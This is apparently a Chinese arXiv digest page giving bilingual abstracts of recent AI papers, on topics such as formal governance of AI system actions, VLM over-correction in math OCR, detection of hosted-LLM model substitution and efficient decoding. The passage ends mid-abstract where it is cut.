每个产生效应的系统都有两个边界:它能做什么(表达能力)和治理覆盖什么(治理)。在几乎所有已部署的AI系统中,这些边界是独立定义的,从而产生三个区域:受治理的能力(唯一有用的区域)、未受治理的能力(风险)以及针对不存在的能力的治理策略(作秀)。三个区域中有两个是失败模式。我们关注效应的治理:AI系统在世界中执行的动作(API调用、数据库写入、工具调用)。这不同于模型输出的治理(内容质量、偏见、公平性),后者在不同层面运作并需要不同的机制。我们提出了一个形式化框架来分析这种结构性差距。Rice定理(1953)证明,对于任何试图行为性地治理效应的图灵完备架构,该差距在一般情况下是不可判定的:没有算法可以决定任意程序的非平凡语义属性,包括属性“该程序的效应符合治理策略”。我们定义了共延治理:一种系统属性,其中表达能力边界等于治理边界。我们证明共延治理需要架构决策(将计算与效应分离),而不是事后添加的治理层。我们表明,在这种分离下的结构治理包含了独立的治理基础设施:治理检查成为执行流水线的一部分,而不是与之并行的第二系统。我们提出共延治理作为任何AI治理系统的可测试标准:要么两个边界可证明相同,要么风险和作秀在结构上不可避免。证明在Coq中机械化(454个定理,36个模块,0个待证)。

英文摘要

Every system that performs effects has two boundaries: what it can do (expressiveness) and what governance covers (governance). In nearly all deployed AI systems, these boundaries are defined independently, creating three regions: governed capabilities (the only useful region), ungoverned capabilities (risk), and governance policies that address non-existent capabilities (theater). Two of the three regions are failure modes. We focus on the governance of effects: actions that AI systems perform in the world (API calls, database writes, tool invocations). This is distinct from the governance of model outputs (content quality, bias, fairness), which operates at a different level and requires different mechanisms. We present a formal framework for analyzing this structural gap. Rice's theorem (1953) proves the gap is undecidable in the general case for any Turing-complete architecture that attempts to govern effects behaviorally: no algorithm can decide non-trivial semantic properties of arbitrary programs, including the property "this program's effects comply with the governance policy." We define coterminous governance: a system property where the expressivenessboundary equals the governance boundary. We show that coterminous governance requires an architectural decision (separatingcomputation from effect) rather than a governance layer added after the fact. We show that structural governance under this separation subsumes separate governance infrastructure: governance checks become part of the execution pipeline rather than a second system running alongside it. We propose coterminous governance as the testable criterion for any AI governance system: either the two boundaries are provably identical, or risk and theater are structurally inevitable. Proofs are mechanized in Coq (454 theorems, 36 modules, 0 admitted).

2604.27289 2026-05-27 cs.AI 版本更新

Mechanized Foundations of Structural Governance: Machine-Checked Proofs for Governed Intelligence

结构治理的机械化基础:受治理智能的机器验证证明

Alan L. McCann

发表机构 * Mashin, Inc.(Mashin公司)

AI总结 本文通过Coq机械化证明和纸上证明,建立了认知工作流系统中结构治理的理论基础,包括共归纳安全谓词、治理不变性定理、充分性定理、交替范式、必要性定理,并通过属性测试验证了BEAM运行时与规范的一致性。

Comments 27 pages, 4 figures, 1 table. Code and proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. v2: corrected cross-reference identifiers for companion papers. Updated license

详情
AI中文摘要

我们提出了认知工作流系统结构治理理论中的五个结果。其中三个使用Interaction Trees库和参数化共归纳在Coq 8.19中机械化实现;两个通过显式归约在纸上证明。共归纳安全谓词(gov_safe)是一个共归纳性质,捕获无限程序行为的治理安全性,由布尔权限标志索引,该标志对于未治理的I/O可证明为假,对于治理的解释为真(机械化)。治理不变性定理证明治理在元递归塔上是统一的:第n+1层的治理通过类型的定义性等式归约为第n层的治理(机械化)。充分性定理证明四个原子原语(代码、推理、内存、调用)对于任何离散智能系统在表达上完备,形式化为Kleisli范畴的组合闭包(机械化)。交替范式提供任何机器到交替代码和效果层的规范分解,具有合流重写系统(纸上证明)。必要性定理通过显式归约为Rice定理证明,对于需要语义判断的问题,架构不透明组件(推理原语)在数学上是必要的(纸上证明)。第六个贡献将抽象模型连接到部署的运行时:验证解释器规范在Coq中形式化了BEAM运行时的信任、能力和哈希链逻辑,然后使用基于属性的测试对运行系统进行测试,使用超过70,000个随机生成的指令序列,零分歧。机械化包括约12,000行代码,跨越36个模块,包含454个定理和零个待证明引理。

英文摘要

We present five results in the theory of structural governance for cognitive workflow systems. Three are mechanized in Coq 8.19 using the Interaction Trees library with parameterized coinduction; two are proved on paper with explicit reductions. The Coinductive Safety Predicate (gov_safe) is a coinductive property that captures governance safety for infinite program behaviors, indexed by a boolean permission flag that is provably false for ungoverned I/O and true for governed interpretations (mechanized). The Governance Invariance Theorem establishes that governance is uniform across the meta-recursive tower: governance at level n+1 reduces to governance at level n by definitional equality of the type (mechanized). The Sufficiency Theorem proves that four atomic primitives (code, reason, memory, call) are expressively complete for any discrete intelligent system, formalized as compositional closure of a Kleisli category (mechanized). The Alternating Normal Form provides a canonical decomposition of any machine into alternating code and effect layers, with a confluent rewriting system (paper proof). The Necessity Theorem proves via explicit reduction to Rice's theorem that an architecturally opaque component (the reason primitive) is mathematically necessary for problems requiring semantic judgment (paper proof). A sixth contribution connects the abstract model to the deployed runtime: the Verified Interpreter Specification formalizes the BEAM runtime's trust, capability, and hash chain logic in Coq, then tests the running system against this specification using property-based testing with over 70,000 randomly generated directive sequences and zero disagreements. The mechanization comprises approximately 12,000 lines across 36 modules with 454 theorems and zero admitted lemmas.

2604.22774 2026-05-27 cs.CY cs.AI cs.CV cs.LG 版本更新

When VLMs 'Fix' Students: Identifying and Penalizing Over-Correction in the Evaluation of Multi-line Handwritten Math OCR

当VLM“修正”学生:多行手写数学OCR评估中的过度修正识别与惩罚

Jin Seong, Wencke Liermann, Minho Kim, Jong-hun Shin, Soojong Lim

发表机构 * Electronics and Telecommunications Research Institute(电子通信研究所)

AI总结 针对多行手写数学OCR评估中VLM过度修正问题,提出基于LLM的语义评估指标PINK,有效惩罚过度修正,在FERMAT数据集上优于BLEU。

详情
AI中文摘要

手写数学的准确转录对于教育AI系统至关重要,但当前基准未能正确评估这一能力。大多数先前研究关注单行表达式,并依赖BLEU等词汇指标,无法评估跨多行学生解决方案的语义推理。本文首次系统研究多行手写数学光学字符识别(OCR),揭示了视觉语言模型(VLM)的一个关键失败模式:过度修正。这些模型往往“修正”错误,而非忠实地转录学生作品,从而隐藏了教育评估旨在检测的错误。为解决此问题,我们提出PINK(基于惩罚的INK分数),一种语义评估指标,利用大语言模型(LLM)进行基于评分标准的评分,并明确惩罚过度修正。我们在FERMAT数据集上对15个最先进的VLM进行全面评估,发现与BLEU相比出现显著的排名反转:GPT-4o等模型因激进的过度修正受到严重惩罚,而Gemini 2.5 Flash成为最忠实的转录者。此外,人类专家研究表明,PINK与人类判断的一致性显著更高(55.0%偏好,而BLEU为39.5%),为教育场景中的手写数学OCR提供了更可靠的评估框架。

英文摘要

Accurate transcription of handwritten mathematics is crucial for educational AI systems, yet current benchmarks fail to evaluate this capability properly. Most prior studies focus on single-line expressions and rely on lexical metrics such as BLEU, which fail to assess the semantic reasoning across multi-line student solutions. In this paper, we present the first systematic study of multi-line handwritten math Optical Character Recognition (OCR), revealing a critical failure mode of Vision-Language Models (VLMs): over-correction. Instead of faithfully transcribing a student's work, these models often "fix" errors, thereby hiding the very mistakes an educational assessment aims to detect. To address this, we propose PINK (Penalized INK-based score), a semantic evaluation metric that leverages a Large Language Model (LLM) for rubric-based grading and explicitly penalizes over-correction. Our comprehensive evaluation of 15 state-of-the-art VLMs on the FERMAT dataset reveals substantial ranking reversals compared to BLEU: models like GPT-4o are heavily penalized for aggressive over-correction, whereas Gemini 2.5 Flash emerges as the most faithful transcriber. Furthermore, human expert studies show that PINK aligns significantly better with human judgment (55.0% preference over BLEU's 39.5%), providing a more reliable evaluation framework for handwritten math OCR in educational settings.

2603.13381 2026-05-27 cs.LG cs.AI 版本更新

Beyond Linearity in Attention Projections: The Case for Nonlinear Queries

注意力投影中的非线性:非线性查询的情况

Marko Karbevski

发表机构 * Simplicity Technologies(简化科技)

AI总结 本文提出用非线性残差替换注意力中的查询投影W_Q,通过瓶颈MLP实现,在GPT-3小模型上验证了性能提升。

Comments Accepted at the ICLR 2026 GRaM workshop: https://openreview.net/forum?id=pwdnneFiNZ#discussion

详情
AI中文摘要

最近的代数分析表明,在仅解码器和仅编码器Transformer中,查询投影$W_Q$可以设置为恒等映射而不会显著降低性能。这是因为注意力仅通过乘积$XW_Q, XW_K, XW_V$依赖于$X$,允许基变换被相邻层吸收并通过网络传播。我们将$W_Q \in \R^{d imes d}$替换为非线性残差形式$Q(X) = X + f_θ(X)$,其中$f_θ$是一个瓶颈MLP,具有$d^2 + O(d)$个参数。恒等项将非线性锚定到已知良好的先验。在GPT-3小规模风格模型上的实验显示,与基线相比持续改进(验证对数损失降低$2.40\%$,困惑度降低$6.81\%$),轻松优于参数增加12.5%的非嵌入参数模型。这些结果激励在更大规模和多模态上的研究。

英文摘要

Recent algebraic analysis shows that in decoder-only and encoder-only transformers, the Query projection $W_Q$ may be set to identity without noticeable performance deterioration. This is possible because attention depends on $X$ only through the products $XW_Q, XW_K, XW_V$, allowing basis transformations to be absorbed by adjacent layers and propagated through the network. We replace $W_Q \in \R^{d \times d}$ with a nonlinear residual of the form $Q(X) = X + f_θ(X)$, where $f_θ$ is a bottleneck MLP with $d^2 + O(d)$ parameters. The identity term anchors the nonlinearity to a known-good prior. Experiments on GPT-3 small style models show consistent improvement over the baseline ($2.40\%$ lower validation log-loss, $6.81\%$ lower perplexity), comfortably outperforming a model with 12.5\% more non-embedding parameters. These results motivate investigation at larger scales and across modalities.

2512.05794 2026-05-27 cs.LG cs.AI q-bio.QM 版本更新

Mechanistic Interpretability of Antibody Language Models Using SAEs

使用 SAE 对抗体语言模型的机制可解释性研究

Rebonto Haque, Oliver M. Turnbull, Anisha Parsan, Nithin Parsan, John J. Yang, Anna L. Beukenhorst, Charlotte M. Deane

发表机构 * Department of Statistics, University of Oxford, UK(英国牛津大学统计系) Reticular, San Francisco, USA(美国旧金山Reticular公司) EECS, MIT, Cambridge MA, USA(美国麻省理工学院电子工程与计算机科学系) Leyden Laboratories BV, Leiden, The Netherlands(荷兰莱顿实验室)

AI总结 本研究采用 TopK 和 Ordered 稀疏自编码器(SAE)对抗体语言模型进行机制可解释性分析,发现 TopK SAE 能揭示有意义的生物学潜在特征但无法保证生成控制,而 Ordered SAE 通过层次结构可靠识别可操控特征但激活模式更复杂。

Comments v3: 15 pages; corrected author list and affiliations in the main text; minor text changes; updated steering results following minor code changes; conclusions and findings remain unchanged; included link to data and code in the Data Availability section

详情
AI中文摘要

稀疏自编码器(SAE)是一种机制可解释性技术,已被用于揭示大型蛋白质语言模型中学到的概念。在此,我们采用 TopK 和 Ordered SAE 来研究自回归抗体语言模型,并引导其生成。我们表明,TopK SAE 可以揭示有生物学意义的潜在特征,但高特征-概念相关性并不能保证对生成的因果控制。相比之下,Ordered SAE 施加了层次结构,能够可靠地识别可操控特征,但代价是激活模式更复杂且可解释性较低。这些发现推进了领域特异性蛋白质语言模型的机制可解释性,并表明,虽然 TopK SAE 足以将潜在特征映射到概念,但在需要精确生成引导时,Ordered SAE 更可取。

英文摘要

Sparse autoencoders (SAEs) are a mechanistic interpretability technique that have been used to provide insight into learned concepts within large protein language models. Here, we employ TopK and Ordered SAEs to investigate autoregressive antibody language models, and steer their generation. We show that TopK SAEs can reveal biologically meaningful latent features, but high feature-concept correlation does not guarantee causal control over generation. In contrast, Ordered SAEs impose a hierarchical structure that reliably identifies steerable features, but at the expense of more complex and less interpretable activation patterns. These findings advance the mechanistic interpretability of domain-specific protein language models and suggest that, while TopK SAEs suffice for mapping latent features to concepts, Ordered SAEs are preferable when precise generative steering is required.

2604.21454 2026-05-27 cs.CL cs.AI 版本更新

Reasoning Primitives in Hybrid and Non-Hybrid LLMs: Do Architectural Differences Yield Advantages in State-Tracking and Recall?

混合与非混合大语言模型中的推理原语:架构差异在状态追踪和召回中是否带来优势?

Shivam Rawat, Lucie Flek, Florian Mai, Nicholas Kluge Corrêa

发表机构 * Lamarr Institute for Machine Learning and Artificial Intelligence(拉玛尔机器学习与人工智能研究所) Rheinische Friedrich-Wilhelms-Universität Bonn(波恩莱茵河弗里德里希-威廉大学)

AI总结 本研究通过五个受控任务族比较了Transformer和混合架构在状态召回任务上的表现,发现推理增强是主要优势因素,而混合架构的优势较窄且依赖于任务。

详情
AI中文摘要

大型语言模型中的推理通常被视为单一能力,但其部分收益可能源于更简单的底层操作。我们通过五个以状态召回为中心的控制任务族,研究了两种这样的原语——召回和状态追踪,并比较了匹配的Transformer和混合架构(有无推理增强)。在整个套件中,推理增强变体显著优于仅指令变体,通常差距很大。这一模式与“状态超越令牌”观点一致:外部化推理痕迹之所以有帮助,是因为它们在令牌空间中向前传递中间状态。相比之下,一旦推理令牌可用,混合归纳偏置在准确性上并不产生统一优势。当架构差异确实出现时,它们遵循任务结构:混合Think模型在严格顺序的链式更新上更稳健,而Transformer Think模型在平面多跳检索上更稳健。因此,我们将本研究的主要贡献视为对状态召回任务性能驱动因素的描述性说明:推理令牌增强似乎是主导因素,而混合优势更窄、依赖于任务,并且可能更多关乎推理效率而非整体能力。我们还发布了重现这些结果所需的代码库和数据。

英文摘要

Reasoning in large language models is often discussed as a single capability, but some of its gains may stem from simpler underlying operations. We examine two such primitives, recall and state-tracking, through five controlled task families centered on state-based recall, and compare matched transformer and hybrid architectures with and without reasoning augmentation. Across the suite, reasoning-augmented variants substantially outperform instruction-only variants, often by large margins. This pattern is consistent with the State over Tokens view: externalized reasoning traces help because they carry the intermediate state forward in token space. By contrast, hybrid inductive bias does not yield a uniform advantage in accuracy once reasoning tokens are available. When architectural differences do appear, they follow task structure: the hybrid Think model is more robust on strictly sequential chained updates, whereas the transformer Think model is more robust on flat multi-hop retrieval. We therefore cast the main contribution of this study as a descriptive account of what drives performance on state-based recall tasks: reasoning-token augmentation appears to be the dominant factor, while hybrid advantages are narrower, task-dependent, and potentially more about inference efficiency than overall capability. We also release the codebase and data required to reproduce these results.

2604.19667 2026-05-27 cs.CL cs.AI cs.CV cs.LG cs.MA 版本更新

Chat2Workflow: A Benchmark for Generating Executable Visual Workflows with Natural Language

Chat2Workflow: 用自然语言生成可执行可视化工作流的基准

Yi Zhong, Buqiang Xu, Yijun Wang, Zifei Shan, Shuofei Qiao, Guozhou Zheng, Ningyu Zhang

发表机构 * Zhejiang University(浙江大学) Tencent(腾讯)

AI总结 提出Chat2Workflow基准,用于评估大语言模型从自然语言生成可执行可视化工作流的能力,并设计了一个智能体基线以提升性能。

Comments Work in progress

详情
AI中文摘要

目前,可执行的可视化工作流已成为实际工业部署中的主流范式,提供了强大的可靠性和可控性。然而,在当前实践中,此类工作流几乎完全通过手动工程构建:开发人员必须仔细设计工作流,为每个步骤编写提示,并随着需求的变化反复修改逻辑——这使得开发成本高昂、耗时且容易出错。为了研究大语言模型能否自动化这一多轮交互过程,我们引入了Chat2Workflow,一个直接从自然语言生成可执行可视化工作流的基准,并提出了一个稳健的智能体基线以提高性能。该基准基于大量真实业务工作流构建,每个实例的设计使得生成的工作流可以转换并直接部署到实际工作流平台(如Dify和Coze)上。实验结果表明,尽管最先进的语言模型通常能捕捉高层次意图,但在生成正确、稳定且可执行的工作流方面仍存在困难,尤其是在面对复杂且不断变化的需求时。尽管我们的智能体基线带来了高达6.05%的解决率提升,但剩余的现实差距使Chat2Workflow成为推进工业级自动化的基础。代码可在https://github.com/zjunlp/Chat2Workflow获取。

英文摘要

At present, executable visual workflows have emerged as a mainstream paradigm in real-world industrial deployments, offering strong reliability and controllability. However, in current practice, such workflows are almost entirely constructed through manual engineering: developers must carefully design workflows, write prompts for each step, and repeatedly revise the logic as requirements evolve -- making development costly, time-consuming, and error-prone. To study whether large language models can automate this multi-round interaction process, we introduce Chat2Workflow, a benchmark for generating executable visual workflows directly from natural language, and propose a robust agentic baseline to improve performance. The benchmark is built from a large collection of real-world business workflows, with each instance designed so that the generated workflow can be transformed and directly deployed to practical workflow platforms such as Dify and Coze. Experimental results show that while state-of-the-art language models can often capture high-level intent, they struggle to generate correct, stable, and executable workflows, especially given complex and evolving requirements. Although our agentic baseline yields up to 6.05% resolve rate gains, the remaining real-world gap positions Chat2Workflow as a foundation for advancing industrial-grade automation. Code is available at https://github.com/zjunlp/Chat2Workflow.

2604.18751 2026-05-27 cs.LG cs.AI stat.ME stat.ML 版本更新

Beyond Coefficients: Forecast-Necessity Testing for Interpretable Causal Discovery in Nonlinear Time-Series Models

超越系数:非线性时间序列模型中可解释因果发现的预测必要性检验

Valentina Kuskova, Dmitry Zaytsev, Michael Coppedge

发表机构 * Lucy Family Institute for Data & Society(数据与社会联合研究所) University of Notre Dame(诺特大学) Department of Political Science(政治学系)

AI总结 针对非线性时间序列模型中因果分数被误读为回归系数的问题,提出基于边消融和预测比较的预测必要性检验框架,以评估因果关系的实际必要性。

详情
AI中文摘要

非线性机器学习模型越来越多地用于发现时间序列数据中的因果关系,但其输出的解释仍不明确。特别是,正则化神经自回归模型产生的因果分数常被视为回归系数的类比,导致误导性的统计显著性声明。在本文中,我们认为非线性时间序列模型中的因果相关性应通过预测必要性而非系数大小来评估,并提出了一种实用的评估程序。我们提出了一个基于系统边消融和预测比较的可解释评估框架,用于测试候选因果关系是否对准确预测是必要的。以神经加性向量自回归作为案例研究模型,我们将该框架应用于一个关于民主发展的真实世界案例研究,该案例将面板数据(139个国家的民主指标)建模为多元时间序列。我们表明,具有相似因果分数的关系由于冗余、时间持久性和特定制度效应,其预测必要性可能差异巨大。我们的结果展示了预测必要性检验如何支持应用AI系统中更可靠的因果推理,并为在高风险领域解释非线性时间序列模型提供实用指导。

英文摘要

Nonlinear machine-learning models are increasingly used to discover causal relationships in time-series data, yet the interpretation of their outputs remains poorly understood. In particular, causal scores produced by regularized neural autoregressive models are often treated as analogues of regression coefficients, leading to misleading claims of statistical significance. In this paper, we argue that causal relevance in nonlinear time-series models should be evaluated through forecast necessity rather than coefficient magnitude, and we present a practical evaluation procedure for doing so. We present an interpretable evaluation framework based on systematic edge ablation and forecast comparison, which tests whether a candidate causal relationship is required for accurate prediction. Using Neural Additive Vector Autoregression as a case study model, we apply this framework to a real-world case study of democratic development, modeled as a multivariate time series of panel data - democracy indicators across 139 countries. We show that relationships with similar causal scores can differ dramatically in their predictive necessity due to redundancy, temporal persistence, and regime-specific effects. Our results demonstrate how forecast-necessity testing supports more reliable causal reasoning in applied AI systems and provides practical guidance for interpreting nonlinear time-series models in high-stakes domains.

2504.01733 2026-05-27 cs.AI cs.CC cs.LO 版本更新

Epistemic Skills: Reasoning about Knowledge and Oblivion

认知技能:关于知识与遗忘的推理

Xiaolong Liang, Yì N. Wáng

发表机构 * School of Philosophy, Shanxi University, Taiyuan, Shanxi, China(山西大学哲学学院) School of Philosophy and Social Development, Shandong University, Jinan, Shandong, China(山东大学哲学与社会发展学院)

AI总结 本文提出一类认知逻辑,通过加权模型系统引入“认知技能”度量,将知识获取建模为技能提升、遗忘建模为技能下降,并研究可知性与可遗忘性以及de re与de dicto表达的区别,分析了模型检测和可满足性的计算复杂性。

详情
Journal ref
Logical Methods in Computer Science, Volume 22, Issue 2 (May 25, 2026) lmcs:15460
AI中文摘要

本文提出了一类认知逻辑,用于捕捉获取知识和陷入遗忘的动态过程,同时融入群体知识的概念。该方法基于加权模型系统,引入“认知技能”度量来表示与知识更新相关的认知能力。在此框架内,知识获取被建模为技能提升的过程,而遗忘则被表示为技能下降的结果。该框架进一步支持探索“可知性”和“可遗忘性”,分别定义为通过技能提升获得知识的潜力和通过技能下降陷入遗忘的潜力。此外,它还支持对认知de re与de dicto表达之间区别的详细分析。研究了模型检测和可满足性问题的计算复杂性,提供了对其理论基础和实际意义的洞察。

英文摘要

This paper presents a class of epistemic logics that captures the dynamics of acquiring knowledge and descending into oblivion, while incorporating concepts of group knowledge. The approach is grounded in a system of weighted models, introducing an ``epistemic skills'' metric to represent the epistemic capacities tied to knowledge updates. Within this framework, knowledge acquisition is modeled as a process of upskilling, whereas oblivion is represented as a consequence of downskilling. The framework further enables exploration of ``knowability'' and ``forgettability,'' defined as the potential to gain knowledge through upskilling and to lapse into oblivion through downskilling, respectively. Additionally, it supports a detailed analysis of the distinctions between epistemic de re and de dicto expressions. The computational complexity of the model checking and satisfiability problems is examined, offering insights into their theoretical foundations and practical implications.

2604.18179 2026-05-27 cs.CR cs.AI 版本更新

Committed SAE-Feature Traces for Audited-Session Substitution Detection in Hosted LLMs

托管LLM中审计会话替换检测的承诺SAE特征轨迹

Ziyang Liu

AI总结 提出一种承诺-开放协议,通过Merkle树提交稀疏自编码器特征轨迹,以检测托管LLM提供商在服务中静默替换模型的行为。

Comments We identified inaccuracies in the security analysis: the closed-form intrinsic-dimension lower bound on the feature-forgery attacker (Proposition 4.2, Section 4, Appendix V) and the cross-backend noise calibration for the joint z-score threshold (Section 5.1, Table 2). These affect the claimed attack-resistance guarantees. We are withdrawing the paper to correct them before resubmission

详情
AI中文摘要

托管LLM提供商存在静默替换的动机:宣传更强的模型,同时提供更便宜的回复。诸如SVIP的探测后返回方案存在并行服务的侧信道,因为不诚实的提供商可以将验证者的探测路由到广告模型,同时为普通用户提供替代模型。我们提出一种承诺-开放协议来弥补这一漏洞。在任何开放请求之前,提供商通过Merkle树提交其在发布探测层上服务输出的每个位置稀疏自编码器(SAE)特征轨迹草图。验证者打开随机位置,根据公共命名电路探测库(经过跨后端噪声校准)进行评分,并使用固定阈值联合一致性z分数规则做出决策。我们在三个骨干模型上实例化该协议——Qwen3-1.7B、Gemma-2-2B,以及扩展到Gemma-2-9B(配备131k特征SAE)的4.5倍规模。在17种攻击者中,包括同族提升、跨族替代和秩<=128的自适应LoRA,所有攻击者都在共享的尺度稳定阈值下被拒绝;相同的攻击者都规避了匹配的SVIP风格并行服务基线。一种通过冻结SAE编码器反向传播的白盒端到端攻击并未缩小差距,而一种从不运行M_hon的特征伪造攻击者通过内在维度论证被封闭形式地限制。承诺在批大小为32时,仅增加不超过2.1%的前向计算时间。

英文摘要

Hosted-LLM providers have a silent-substitution incentive: advertise a stronger model while serving cheaper replies. Probe-after-return schemes such as SVIP leave a parallel-serve side-channel, since a dishonest provider can route the verifier's probe to the advertised model while serving ordinary users from a substitute. We propose a commit-open protocol that closes this gap. Before any opening request, the provider commits via a Merkle tree to a per-position sparse-autoencoder (SAE) feature-trace sketch of its served output at a published probe layer. A verifier opens random positions, scores them against a public named-circuit probe library calibrated with cross-backend noise, and decides with a fixed-threshold joint-consistency z-score rule. We instantiate the protocol on three backbones -- Qwen3-1.7B, Gemma-2-2B, and a 4.5x scale-up to Gemma-2-9B with a 131k-feature SAE. Of 17 attackers spanning same-family lifts, cross-family substitutes, and rank-<=128 adaptive LoRA, all are rejected at a shared, scale-stable threshold; the same attackers all evade a matched SVIP-style parallel-serve baseline. A white-box end-to-end attack that backpropagates through the frozen SAE encoder does not close the margin, and a feature-forgery attacker that never runs M_hon is bounded in closed form by an intrinsic-dimension argument. Commitment adds <=2.1% to forward-only wall-clock at batch 32.

2604.18103 2026-05-27 cs.AI 版本更新

Stability Implies Redundancy: Delta Attention Selective Halting for Efficient Long-Context Prefilling

稳定性意味着冗余:Delta注意力选择性停止用于高效长上下文预填充

Yujie Chen, Tailai Chen, Yifeng Gao, Zoe Wanying He, Yijue Xu, Shaobo Wang, Linfeng Zhang

发表机构 * Shanghai Jiao Tong University(上海交通大学) University of California, San Diego(加州大学圣地亚哥分校) Carnegie Mellon University(卡内基梅隆大学)

AI总结 针对长上下文场景中预填充计算成本高的问题,提出一种无需训练的Delta注意力选择性停止策略(DASH),通过监控自注意力层更新动态来停止稳定令牌的处理,从而在不牺牲模型准确性和硬件效率的前提下实现预填充加速。

Comments Accepted to ACL 2026 main conference

详情
AI中文摘要

预填充计算成本在长上下文设置中对大型语言模型(LLMs)和大型多模态模型(LMMs)构成了显著瓶颈。虽然令牌剪枝减少了序列长度,但先前的方法依赖于启发式规则,这些规则与FlashAttention等硬件高效内核不兼容。在这项工作中,我们观察到令牌会向 extit{语义固定点}演化,使得进一步处理变得冗余。为此,我们引入了Delta注意力选择性停止(DASH),这是一种无需训练的策略,通过监控自注意力机制的逐层更新动态来选择性停止已稳定的令牌。大量评估证实,DASH在语言和视觉基准测试中具有泛化能力,在保持模型准确性和硬件效率的同时,实现了显著的预填充加速。代码将在https://github.com/verach3n/DASH.git发布。

英文摘要

Prefilling computational costs pose a significant bottleneck for Large Language Models (LLMs) and Large Multimodal Models (LMMs) in long-context settings. While token pruning reduces sequence length, prior methods rely on heuristics that break compatibility with hardware-efficient kernels like FlashAttention. In this work, we observe that tokens evolve toward \textit{semantic fixing points}, making further processing redundant. To this end, we introduce Delta Attention Selective Halting (DASH), a training-free policy that monitors the layer-wise update dynamics of the self-attention mechanism to selectively halt stabilized tokens. Extensive evaluation confirms that DASH generalizes across language and vision benchmarks, delivering significant prefill speedups while preserving model accuracy and hardware efficiency. Code will be released at https://github.com/verach3n/DASH.git.

2510.06133 2026-05-27 cs.CL cs.AI 版本更新

CreditDecoding: Accelerating Parallel Decoding in Diffusion Large Language Models with Trace Credit

CreditDecoding: 利用轨迹信用加速扩散大语言模型中的并行解码

Kangyu Wang, Zhiyun Jiang, Haibo Feng, Weijia Zhao, Lin Liu, Jianguo Li, Zhenzhong Lan, Weiyao Lin

发表机构 * Shanghai Jiao Tong University(上海交通大学) Ant Group(蚂蚁集团) Westlake University(西湖大学)

AI总结 针对扩散大语言模型并行解码中正确令牌被反复重掩导致冗余迭代的问题,提出基于轨迹信用的无训练并行解码方法CreditDecoding,融合历史证据与当前logits提升低置信度正确令牌的置信度,实现高达5.48倍加速并提升准确性。

Comments 19 pages, 13 figures, 9 tables, Accepted to ACL 2026 main conference

详情
AI中文摘要

扩散大语言模型(dLLMs)通过迭代去噪生成文本。在普遍采用的并行解码方案中,每一步仅确认高置信度位置,而重掩其他位置。通过分析dLLM去噪轨迹,我们发现一个关键的低效问题:模型通常在目标令牌的置信度足够高以被解码之前的几个步骤就预测出正确令牌。这种早期预测与后期解码之间的差距导致已正确的令牌被反复重掩,造成冗余迭代并限制加速。为利用这种时间冗余,我们引入轨迹信用(Trace Credit),通过累积历史证据来量化令牌的解码潜力。基于此,我们提出CreditDecoding,一种无训练的并行解码方法,将轨迹信用与当前logits融合,以提升正确但低置信度令牌的置信度,从而加速去噪并提高鲁棒性。在八个基准测试上,CreditDecoding在LLaDA-8B上实现了高达5.48倍的加速和+0.48的准确率提升,并在多种dLLM架构和参数规模上持续改进性能。它还能扩展到长上下文,并与主流推理优化方法正交,使其成为一种实用且广泛适用的解决方案。

英文摘要

Diffusion large language models (dLLMs) generate text through iterative denoising. In commonly adopted parallel decoding schemes, each step confirms only high-confidence positions while remasking the others. By analyzing dLLM denoising traces, we uncover a key inefficiency: models often predict the correct target token several steps before its confidence becomes high enough to be decoded. This gap between early prediction and late decoding forces repeated remasking of already-correct tokens, causing redundant iterations and limiting acceleration. To exploit this temporal redundancy, we introduce Trace Credit to quantify a token's decoding potential by accumulating historical evidence. Building on this, we propose CreditDecoding, a training-free parallel decoding method that fuses Trace Credit with current logits to boost the confidence of correct but underconfident tokens, thereby accelerating denoising and improving robustness. On eight benchmarks, CreditDecoding achieves up to 5.48 times speedup with +0.48 accuracy on LLaDA-8B and consistently improves performance across diverse dLLM architectures and parameter scales. It further scales to long contexts and remains orthogonal to mainstream inference optimizations, making it a practical and widely applicable solution.

2604.14640 2026-05-27 cs.CL cs.AI 版本更新

Fact4ac at the Financial Misinformation Detection Challenge Task: Reference-Free Financial Misinformation Detection via Fine-Tuning and Few-Shot Prompting of Large Language Models

Fact4ac在金融虚假信息检测挑战赛中的方法:通过微调和少样本提示的大语言模型实现无参考金融虚假信息检测

Cuong Hoang, Le-Minh Nguyen

发表机构 * KaiNKaiho

AI总结 本文提出一种结合零样本/少样本提示和LoRA参数高效微调的大语言模型框架,用于无外部证据的金融虚假信息检测,在公开和私有测试集上分别达到95.4%和96.3%的准确率,获得竞赛第一名。

详情
Journal ref
Proceedings of the 2nd Workshop on Misinformation Detection in the Era of LLMs (MisD 2026), 20th International AAAI Conference on Web and Social Media
AI中文摘要

金融虚假信息的泛滥对市场稳定和投资者信任构成严重威胁,误导市场行为并造成关键信息不对称。检测此类误导性叙述本身具有挑战性,尤其是在现实场景中,外部证据或用于交叉验证的补充参考资料严格不可用。本文介绍了我们在“无参考金融虚假信息检测”共享任务中的获胜方法。该任务基于最近提出的RFC-BENCH框架(Jiang等人,2026),挑战模型仅依赖内部语义理解和上下文一致性而非外部事实核查来判断金融声明的真实性。为应对这一艰巨的评估设置,我们提出了一个综合框架,利用最先进的大语言模型(LLM)的推理能力。我们的方法系统地集成了上下文学习(特别是零样本和少样本提示策略)以及通过低秩适应(LoRA)的参数高效微调(PEFT),以最优方式使模型与金融操纵的微妙语言线索对齐。我们提出的系统表现出卓越效果,成功在两个官方排行榜上均获得第一名。具体来说,我们在公开测试集上达到95.4%的准确率,在私有测试集上达到96.3%的准确率,突显了我们方法的鲁棒性,并有助于加速金融自然语言处理中上下文感知的虚假信息检测。我们的模型(14B和32B)可在https://huggingface.co/KaiNKaiho获取。

英文摘要

The proliferation of financial misinformation poses a severe threat to market stability and investor trust, misleading market behavior and creating critical information asymmetry. Detecting such misleading narratives is inherently challenging, particularly in real-world scenarios where external evidence or supplementary references for cross-verification are strictly unavailable. This paper presents our winning methodology for the "Reference-Free Financial Misinformation Detection" shared task. Built upon the recently proposed RFC-BENCH framework (Jiang et al. 2026), this task challenges models to determine the veracity of financial claims by relying solely on internal semantic understanding and contextual consistency, rather than external fact-checking. To address this formidable evaluation setup, we propose a comprehensive framework that capitalizes on the reasoning capabilities of state-of-the-art Large Language Models (LLMs). Our approach systematically integrates in-context learning, specifically zero-shot and few-shot prompting strategies, with Parameter-Efficient Fine-Tuning (PEFT) via Low-Rank Adaptation (LoRA) to optimally align the models with the subtle linguistic cues of financial manipulation. Our proposed system demonstrated superior efficacy, successfully securing the first-place ranking on both official leaderboards. Specifically, we achieved an accuracy of 95.4% on the public test set and 96.3% on the private test set, highlighting the robustness of 